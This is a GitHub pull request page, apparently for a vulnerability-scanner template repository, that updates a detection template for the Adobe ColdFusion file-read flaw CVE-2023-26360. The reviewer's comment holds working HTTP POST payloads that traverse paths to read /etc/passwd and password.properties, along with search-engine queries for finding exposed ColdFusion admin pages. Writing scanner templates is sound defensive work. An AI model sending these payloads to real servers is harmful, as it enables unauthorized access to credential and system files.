Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Adding access control check for CVE-2023-26360 #11398

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

Adding access control check for CVE-2023-26360 #11398

wants to merge 1 commit into from

Conversation

7own
Copy link

@7own 7own commented Dec 20, 2024

Template / PR Information

Sometime the CVE-2023-44352 could not be exploited as is and require additional access control bypass.
With the provided template's update, if the instance is vulnerable to CVE-2023-29298 and/or CVE-2023-38205, the CVE-2023-44352 could be exploited so it should be raised to the end user.

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@GeorginaReeder
Copy link

Thanks for your contribution @7own ! :)

@ritikchaddha ritikchaddha self-assigned this Dec 23, 2024
@ritikchaddha
Copy link
Contributor

Hello @7own, We appreciate your efforts in updating the template and making it more suitable. Your contribution has been truly valuable to us.

While we cannot edit the template you provided, I have a few changes to suggest. I'm sharing them below so you can push those changes from your end.

id: CVE-2023-26360

info:
  name: Adobe ColdFusion - Local File Read
  author: DhiyaneshDK,7own
  severity: high
  description: |
    Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the necessary security patches or updates provided by Adobe to fix the vulnerability.
  reference:
    - https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26360
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html
    - http://packetstormsecurity.com/files/172079/Adobe-ColdFusion-Unauthenticated-Remote-Code-Execution.html
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-26360
    cwe-id: CWE-284
    epss-score: 0.96298
    epss-percentile: 0.99537
    cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev

http:
  - raw:
      - |
        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d

      - |
        POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}

      - |
        POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}

      - |
        POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables={"about":{"_metadata":{"classname":"../../../../../../../../../../../etc/passwd"}, "_variables":{}}}

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "password="
          - "encrypted=true"
          - "adobe"
        condition: and

      - type: regex
        regex:
          - "root:.*:0:0:"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@ritikchaddha ritikchaddha

Labels
waiting for more info
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@7own @GeorginaReeder @ritikchaddha